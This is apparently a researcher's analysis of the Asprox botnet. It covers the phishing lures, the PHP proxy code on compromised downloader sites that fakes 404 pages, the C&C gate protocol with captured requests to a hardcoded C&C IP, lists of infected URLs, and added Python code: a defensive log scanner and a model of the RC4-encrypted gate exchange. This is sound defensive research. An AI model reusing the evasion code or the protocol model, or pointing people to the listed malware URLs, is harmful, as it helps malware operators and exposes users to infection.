Asprox malware is being spread with phishing emails claiming to be from DHL, FedEx, USPS, American Airlines, Costco, Walmart, Pizza Hut, Home Depot, Target and many others. It also likes to claim it is a court order, a funeral or wedding announcement, or a missed voicemail from WhatsApp.
I call this botnet Asprox based on the whitepaper from Trend Micro. Its architecture looks like an enterprise cloud-based service for building a botnet of infected hosts. The infrastructure has two visible load-balanced layers and at least two hidden inner layers.
It goes like this:
Email distribution
Phishing emails in this campaign seem to be sent mostly from hacked web servers.
Phishing email
January 2014 phishing is for energy bills.
December 2013 was a killing spree of many different phishing campaigns for Costco, BestBuy, Walmart, My CV, Adobe.
September/October 2013 templates pretend to be wedding invitations or voicemail from WhatsApp.
May-July 2013 phishing emails direct the victims to follow a URL to "Get Shipment Info" or to enter the shipment number on a "Tracking Page" (DHL), to "Print Receipt" to receive a parcel (FedEx), to "Download It" to use a flight ticket (American Airlines), or to display a "Shipment Label" (UPS).
Downloader sites
The phishing email points to compromised websites serving a ZIP file with a malicious executable, the Asprox downloader. At the beginning of May 2013 these sites tended to be mainly compromised Joomla 1.5 servers. By the end of May quite a lot of the websites were hosted in the US and not necessarily Joomla related. The Asprox botnet, or the people behind it, probably use several exploits to compromise various PHP websites.
Links from the phishing emails lead to a malicious PHP script on the compromised website. This PHP script proxies all requests to another backend server (in 2013 there was one IP in Russia (62.109.31.142) and a whole bulk of IP addresses in Germany), but there are definitely more such servers. In case of failure, suspicion or an exceeded request threshold the PHP script reports a fake "404 Not Found" error code.
Download zipfile
The victim downloads the ZIP file from the site; it contains an executable file such as "Delivery Information.exe". The executable has the icon of a Word file to convince the victim to open/run it.
Execute the downloader
When the victim executes the malware, it mimics something benign: Notepad is opened to show some bogus tracking information.
The malware masquerades as a Windows binary (svchost.exe) to run hidden and undetected in the background.
The EXE file is removed and replaced with a TXT file.
Command & Control center(s) - dozens of nginx proxies
The malware contacts a round-robin list of C&C servers for commands and for downloading other malware. The list of IPs is hardcoded into the downloader binary; an updated list of C&Cs can be obtained from the C&C. The sites contacted are another farm of compromised web servers running nginx configured as a reverse proxy. All requests are proxied to a backend C&C server.
Download other germs
Other malware is then downloaded, executed, and so on.
More layers?
... there are possibly more layers.
The malware generated in the WhatsApp phishing campaign has the icon of a musical note to fool the victims into thinking it is a sound file.
Interesting bits
These bits make it interesting:
Scale
- The group seems to have been running this very same infrastructure for at least 1 year. New evasion features are added over time, like encrypting the requests. The campaign in May 2013 used, within 2 weeks, dozens of compromised Joomla servers to serve the downloader malware. It is using dozens of servers (mostly compromised web servers) to send spam. And as of writing, the backend C&C is active on at least 34 IP addresses at once. If you consider that they probably have more to move on to once the current ones are closed, the scale is really like a small enterprise.
Evasion
- Malicious scripts on compromised download sites stop serving malware after some time and respond with a fake HTTP 404 Not Found response, probably to encourage less savvy admins to stay on the current vulnerable version, as it seems the problem went away by itself. Similar evasion techniques are implemented on the C&C sites.
Automation
- New obfuscated downloader binaries are generated at least twice a day. The FakeAV binaries downloaded from the C&C are automatically generated every 6 minutes. This ensures that samples at the time of execution are not known to your antivirus. It usually takes AV companies 1-3 days to make a signature and make it available for download, and then more days until the victim bothers to update the antivirus signatures.
Cloud
- The availability of cheap cloud services allows "throw-away" C&Cs to be hosted anywhere, especially when the host is a compromised server paid for by somebody else :). It is surprising that the 1st and 2nd layers of C&Cs are not hosted on some bullet-proof hosting in China or Ukraine, but in countries like France, the United Kingdom, the USA, the Netherlands or Germany.
Chewy details
Email Distribution
Phishing Emails
Sample DHL:
If the links are not working, please move message to "Inbox" folder.
DHL
26.04.2013 PACK STATION
DHL Ship Shipment Notification
On April 25, 2013 a shipment label was printed for delivery.
The shipment number of this package is 36085695.
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
Get Shipment Info
2) Enter the shipment number on tracking page:
Tracking Page
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
Disclaimer:
This message was created by DHL Ship, a product of DHL, at the request
of the sender. No authentication of email address has been performed.
Deutsche Post DHL 2013 DHL International GmbH. All rights reserved.
Sample DHL Express:
DOWNLOAD
MAILING LABEL
Downloader sites
The majority of the sites serving the malicious downloader file in the May campaign seem to be servers with Joomla 1.5. The backend script serving the downloader enforces some limits on the download of the malware:
- limit of 4 downloads per IP - the count seems to be shared across the botnet infrastructure; this limitation probably keeps it low profile against services like Google Badware
- allow only certain User-Agents
- probably some other filtering (GeoIP? language?)
// Fake 404 handler from the newer version of the proxy script (after August 2013).
// http_request() is a helper defined elsewhere in the same script.
function error_404(){
    header("HTTP/1.1 404 Not Found");
    // request URI with the query string stripped
    $uri=preg_replace("/(\?).*\$/","",$_SERVER["REQUEST_URI"]);
    // fetch the host's own 404 page for a path that does not exist ...
    $content=http_request("http://".$_SERVER["SERVER_NAME"]."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
    // ... and substitute the real request URI so the page matches the server's genuine 404
    $content=str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA",$uri,$content);
    exit($content);
}
Older versions (until August 2013) used a static page, which made it possible to fingerprint the proxy script:
$ curl http://www.into-focus.de/templates/system/onlines.php?get_info=4_36160170
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
</body></html>
Rendered, it looks like an ordinary 404 page: "404 Not Found - The requested URL was not found on this server."
The download sites are reused at the same time for different phishing campaigns and serve different malware binaries depending on the type of request.
Request | Campaign | Sample | Name of EXE |
?ticket= | American Airlines | http://andiburns.de/img/get.php?ticket=ss00_323 | Electronic Ticket.exe |
?get_info= | DHL | http://andiburns.de/img/get.php?get_info=ss00_323 | Shipment_Status_008436284830.exe |
?info= | DHL | http://andiburns.de/img/get.php?info=ss00_323 | Shipment_Status_008436284830.exe |
?i_info= | FedEx | http://andiburns.de/img/get.php?i_info=ss00_323 | Shipment Label.exe |
?receipt= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
?receipt_print= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
?print= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
Status | Link | IP | GeoIP |
active | http://925geek.com/img/get.php?get_info=521_585240407 | 72.167.232.11 | US |
active | http://adarshlifecare.org/img/get.php?get_info=ss00_323 | 108.168.250.181 | US |
active | http://billwhiteart.com/img/get.php?get_info=ss00_323 | 98.130.102.17 | US |
active | http://depro.co/img/get.php?info=888_449980528 | 173.201.246.128 | US |
active | http://donpoyser.com/img/get.php?get_info=ss00_323 | 74.208.46.198 | US |
active | http://dyermob.com/img/get.php?info=882_276561770 | 50.63.221.1 | US |
active | http://exchangenet.com/img/get.php?get_get_info=ss00_323 | 98.124.252.131 | US |
active | http://flavorcap.com/img/get.php?get_info=ss00_323 | 50.63.98.1 | US |
active | http://gebhardtbmw.org/img/get.php?get_info=ss00_323 | 184.168.238.1 | US |
active | http://gokcebeyataturk.k12.tr/img/get.php?get_info=ss00_323 | 46.20.2.139 | TR |
active | http://hardknoxtat.com/img/get.php?get_info=ss00_323 | 67.18.19.165 | US |
active | http://jimkilby.com/img/get.php?info=887_573138391 | 199.116.77.23 | US |
active | http://karaihinducanada.com/img/get.php?info=891_175441593 | 64.90.61.32 | US |
active | http://s350098153.onlinehome.us/img/get.php?info=882_734823154 | 74.208.239.124 | US |
active | http://www.annunciationcatholicchurch.com/img/get.php?info=869_264860539 | 206.251.170.21 | US |
active | http://www.citystreetscafe.com/img/get.php?get_info=ss00_323 | 50.63.53.148 | US |
active | http://www.citystreetscafe.com/img/get.php?info=869_169932852 | 50.63.53.148 | US |
active | http://www.dbarjquilts.com/img/get.php?get_info=521_969257630 | 209.235.128.16 | US |
active | http://www.thebuffalogroup.com/img/get.php?get_info=ss00_323 | 72.167.158.245 | US |
active | http://www.websitesbyideal.com/img/get.php?info=875_91283849 | 50.63.101.1 | US |
active | http://www.zaravand.com/components/.o9h0qw.php?receipt=ss00_323 | 198.245.60.77 | CA |
active | http://tradeline.in.ua/img/get.php?info=833_1616925145 | 178.208.83.20 | RU |
active | http://autobodysecrets.com/img/get.php?info=881_66202498 | 66.147.240.180 | US |
active | http://ezcashsystem.com/img/get.php?get_get_info=ss00_323 | 24.173.94.246 | US |
active | http://mybuildingdesigns.com/img/get.php?info=885_180559499 | ||
active | http://www.calanss.com/img/get.php?info=870_538703202 | 173.201.216.112 | US |
active | http://stevenseagal.com/img/get.php?info=885_31370198 | 97.74.215.39 | US |
active | http://thegrowingplace.com/img/get.php?info=881_97745141 | 209.237.151.16 | US |
infected | http://loegumklosterfriskole.dk/templates/rssgets.php?info=866_42643568 | 81.7.155.10 | DK |
infected | http://st-creative.ru/yggaqjp.php?info=844_375845004 | 89.188.101.82 | RU |
infected | http://systemcorp.com.au/templates/rssgets.php?get_info=ss00_323 | 203.188.159.6 | AU |
infected | http://unghanen.dk/templates/rssgets.php?get_info=ss00_323 | 176.9.62.209 | DE |
infected | http://unghanen.dk/templates/rssgets.php?info=845_1335034365 | 176.9.62.209 | DE |
infected | http://www.纽跃美容.com/components/.ipyxme.php?receipt=ss00_323 | 112.127.76.96 | CN |
infected | http://www.karate.info.pl/images/index.php?info=845_633135578 | 89.161.150.95 | PL |
infected | http://aptekapanacea.ru/images/index.php?get_info=ss00_323 | 89.232.139.17 | RU |
infected | http://bdvi-lsa.de/templates/rssgets.php?get_info=ss00_323 | 85.214.40.177 | DE |
infected | http://bip.sanatoria-dolnoslaskie.pl/templates/rssgets.php?get_info=ss00_323 | 89.161.191.61 | PL |
infected | http://car4me.com.au/templates/rssgets.php?get_info=ss00_323 | 182.160.129.178 | AU |
infected | http://cottomase.com/templates/rssgets.php?get_info=ss00_323 | 93.49.19.133 | IT |
infected | http://maksymumradio.net/templates/rssgets.php?get_info=ss00_323 | 97.74.221.180 | US |
infected | http://marquisgroup.org/templates/rssgets.php?info=833_1340278825 | 199.116.77.3 | US |
infected | http://origin-id.com/dbivfmw.php?get_info=ss00_323 | 184.172.150.128 | US |
infected | http://school1305.ru/images/index.php?get_info=ss00_323 | 78.108.80.10 | RU |
infected | http://toptread.ru/templates/system/onlines.php?info=843_201660006 | 91.234.33.240 | UA |
infected | http://indianapolisbjjcoach.com/templates/rssgets.php?info=831_846774942 | 50.87.36.66 | US |
infected | http://johnyohe.com/templates/rssgets.php?info=834_1659196946 | 97.74.144.174 | US |
infected | http://optima.is/templates/rssgets.php?get_info=ss00_323 | 93.95.225.171 | IS |
infected | http://tda.or.jp/templates/rssgets.php?info=843_562750222 | 175.28.48.18 | JP |
infected | http://threeforksharbor.org/templates/rssgets.php?get_info=ss00_323 | 69.163.209.92 | US |
infected | http://www.12kopra.net/components/.lexrf6.php?receipt=ss00_323 | 212.72.115.42 | SI |
infected | http://www.tricityministries.org/img/get.php?get_info=ss00_323 | 216.105.147.114 | US |
A sample of the PHP script can be found on this forum. It forwards the requests to a backend server together with the IP of the connecting client (taken from proxy headers if present).
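For admins who want to check whether one of their own servers is acting as a download site, the request shapes above are enough for a log check. The following is an added example, not code from the post: it encodes the query keys from the request table and the token format seen in the site list (ss00_323, 521_585240407 and so on), runs them over web-server access log lines, and counts successful downloads per client IP so the 4-per-IP limit can be read off. The log lines, host names and client IPs below are constructed for the demo.

```python
"""Scan combined-format access logs for requests to the Asprox downloader proxy script.

Added example, not code from the original post. The log lines in SAMPLE_LOG are
constructed; the only things taken from the post are the query keys, the token
format and the script paths.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Query keys used by the campaign links, mapped to the lure they belong to
# (request table in the post; get_get_info also appears in the site list).
CAMPAIGN_KEYS = {
    "ticket": "American Airlines",
    "get_info": "DHL",
    "info": "DHL",
    "get_get_info": "DHL",
    "i_info": "FedEx",
    "receipt": "FedEx",
    "receipt_print": "FedEx",
    "print": "FedEx",
}

# Values seen in the post look like ss00_323 or 521_585240407.
TOKEN_RE = re.compile(r"^(?:ss\d+|\d+)_\d+$")

# Apache/nginx combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def match_request(target):
    """Return (campaign, key, token) if the request target looks like a campaign download link."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".php"):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key in CAMPAIGN_KEYS and TOKEN_RE.match(value):
            return CAMPAIGN_KEYS[key], key, value
    return None


def scan_log(lines):
    """Return one hit dict per suspicious request; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = match_request(m.group("target"))
        if found:
            campaign, key, token = found
            hits.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "key": key,
                "token": token,
                "campaign": campaign,
                "status": int(m.group("status")),
            })
    return hits


def per_ip_counts(hits):
    """Successful (200) downloads per client IP. The post reports a shared limit of
    4 per IP, so a client well above that is more likely a scanner than a victim."""
    return Counter(h["ip"] for h in hits if h["status"] == 200)


# Constructed sample log: two campaign downloads, one 404 from a wget probe,
# and two benign requests that share a query key or a directory name.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/May/2013:18:37:17 +0000] "GET /img/get.php?get_info=ss00_323 HTTP/1.1" 200 118272 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [24/May/2013:18:39:02 +0000] "GET /templates/rssgets.php?info=845_1335034365 HTTP/1.1" 404 512 "-" "Wget/1.14"',
    '198.51.100.9 - - [24/May/2013:18:40:11 +0000] "GET /index.php?info=hello HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [24/May/2013:18:40:12 +0000] "GET /img/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '192.0.2.33 - - [24/May/2013:18:41:00 +0000] "GET /components/.o9h0qw.php?receipt=ss00_323 HTTP/1.1" 200 118272 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(per_ip_counts(scan_log(SAMPLE_LOG)))
```

The token check is what keeps the false-positive rate down: plenty of legitimate PHP pages take an info= or print= parameter, but not with the campaign's numeric_numeric value format. A hit with status 404 is still worth a look, since the proxy script answers 404 once its limits are hit or the User-Agent is not on its list.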
Asprox Downloader
The downloader encrypts its requests with RC4 (see the analysis from Trend Micro for more). The encrypted request is passed to the second layer of C&C. The IP addresses of the C&Cs are hardcoded into the downloader binary. The request contains an MD5 hash identifying the victim computer and an action.
Request gate for work
/index.php?r=gate&id=44641684AA45961586718E5F8309ADD9&group=3004spm&debug=0
The id is an MD5 hash identifying the victim machine. The gate responds with a command for the downloader. So far I have seen 3 commands sent to the downloader - rdl, run, idl. According to the analysis from Trend Micro there are more commands. The gate is quite picky about the format of the request, probably to keep a low profile against automated probes from anti-malware sites. If you perform the request with an ordinary browser or a tool like wget, you will most likely get only HTTP 404 Not Found.
rdl
- run DLL. According to Trend Micro the DLL is encrypted with RC4. After download it is injected into the svchost.exe running the downloader and executed.
GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 5.135.115.195:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:17 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2

GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 5.135.115.195:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:19 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84e
run
- run executable. Since 27-Apr-2013 until 22-May-2013 I have seen only e3943d7369aa6add911aca18b3a507f4.exe, which is some rogue antivirus. Checking the report on VirusTotal/ThreatExpert there are links also to other EXE files. Since 23-May-2013 the C&Cs are serving a5347c1b5b4aa9bd13d76736eb57c67f.exe, 6b761f91b02f89f9e695d4b5a87806de.exe and b2f7e9141eb124ce3152352c5df520f7.exe. So far I do not know what the hash filename stands for.
GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 5.135.115.195:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:20 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2
idl
- sleep 1 second
GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 5.135.115.195:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:22 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=idl
Request gate for the list of IPs
/index.php?r=gate/getipslist&id=MACHINEKEY
The id in this case is not the whole MACHINEID (the MD5 identification of the victim) but just its first 8 characters. For example:
GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D68D0315DA139940438195B2E568CDBBD2927A0A9262AF4E155C0D6692CDE0D117C0A5D5F907433B7E160F399D8227CF
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 5.135.115.195:8080
The response is an RC4-encrypted list of IPs of the 3rd-layer C&Cs to contact.
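To make the gate exchange concrete, here is an added example (not the downloader's code and not from the Trend Micro analysis) that models both requests above and parses the plaintext command the gate returns. What the post supports is: the plaintext URL layout, RC4 on the request, an uppercase hex path in the resulting GET, the 8-character id truncation for getipslist, and the c=/u=/a=/k=/n=/crc= fields in the response. The RC4 key is a placeholder assumption, since the post does not give the real one, and what the downloader hashes to derive the machine id is likewise not known, so a caller-supplied fingerprint is hashed instead.

```python
"""Model of the Asprox downloader gate exchange.

Added example, not code from the original post. ASSUMED_KEY and the input to
machine_id() are assumptions; the URL layout, hex path and response fields
follow the captures in the post.
"""
import hashlib
from urllib.parse import parse_qsl

ASSUMED_KEY = b"example-key"  # assumption: the real RC4 key is not in the post


def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Symmetric, so the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def machine_id(host_fingerprint):
    """Victim id as seen in the captures: 32 uppercase hex chars of an MD5.
    What the real downloader hashes is not known from the post (assumption)."""
    return hashlib.md5(host_fingerprint).hexdigest().upper()


def gate_request(mid, group="3004spm", debug=0):
    """Plaintext 'ask for work' request from the post."""
    return f"/index.php?r=gate&id={mid}&group={group}&debug={debug}"


def ipslist_request(mid):
    """getipslist uses only the first 8 characters of the machine id."""
    return f"/index.php?r=gate/getipslist&id={mid[:8]}"


def encrypt_path(plain, key=ASSUMED_KEY):
    """Plaintext request -> '/' + uppercase hex of the RC4 ciphertext,
    the shape of the GET paths in the captures."""
    return "/" + rc4(key, plain.encode()).hex().upper()


def decrypt_path(path, key=ASSUMED_KEY):
    """Inverse of encrypt_path, as a C&C-side proxy would apply it."""
    return rc4(key, bytes.fromhex(path.lstrip("/"))).decode()


# Commands observed in the post, with the meaning it gives them.
KNOWN_COMMANDS = {
    "rdl": "download and run DLL",
    "run": "download and run EXE",
    "idl": "sleep",
}


def parse_gate_response(body):
    """Parse 'c=rdl&u=/get/...&a=1&k=...&n=...&crc=...' into a dict keyed by field.
    Rejects commands the post does not list and download commands without a URL."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    cmd = fields.get("c")
    if cmd not in KNOWN_COMMANDS:
        raise ValueError(f"unknown gate command: {cmd!r}")
    if cmd in ("rdl", "run") and "u" not in fields:
        raise ValueError(f"{cmd} without a download URL")
    fields["meaning"] = KNOWN_COMMANDS[cmd]
    return fields


# Response body captured in the post (rdl command).
CAPTURED_RDL = ("c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222"
                "&crc=8822c5d84333d6b5658dcb460d4d27a2")

if __name__ == "__main__":
    mid = machine_id(b"demo-host")  # constructed fingerprint
    path = encrypt_path(gate_request(mid))
    print("GET", path)
    print("gate sees:", decrypt_path(path))
    print(parse_gate_response(CAPTURED_RDL))
```

The parser is strict on purpose: when you replay traffic from a sandbox, an unknown c= value or an rdl without u= is exactly the case you want to notice rather than silently skip, because it means either the protocol has moved on or you are looking at a decoy response from the gate's anti-probe logic.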
Command & Control center(s)
The current list of active C&C sites is available from the Asprox tracker.
Download other germs
Files are downloaded either as EXE (a plain executable to be run) or as DLL. The DLLs have the extension .crp and very high entropy, which means they are either compressed or encrypted. More analysis of the downloader is needed to determine what happens with the DLL files after download. So far I have identified these files that can be downloaded as DLL modules: Corpus of Asprox Modules
In 2013 Asprox was involved in the distribution of FakeAV: a new malware file (for example /get/e3943d7369aa6add911aca18b3a507f4.exe) was generated once every 6 minutes, and a scheduled job took another 6 minutes to deliver it to the C&C servers. Here are samples for just one day, to give you an idea how much your antivirus will protect you against this threat. At the time of generation a sample is usually found malicious by only about 2-3 out of 46 antivirus vendors at VirusTotal, so most probably it won't be detected by your antivirus at the time of first execution. (The original post links 457 samples, numbered 1 to 457, collected on that single day.)
This EXE file, FakeAV, is a rogue antivirus. Once executed it reports itself to a registration site in Hong Kong:
http://175.41.29.181/api/urls/?ts=a58d9636ae0c6113e51ea304de4b2a0f13cfb16c&affid=70308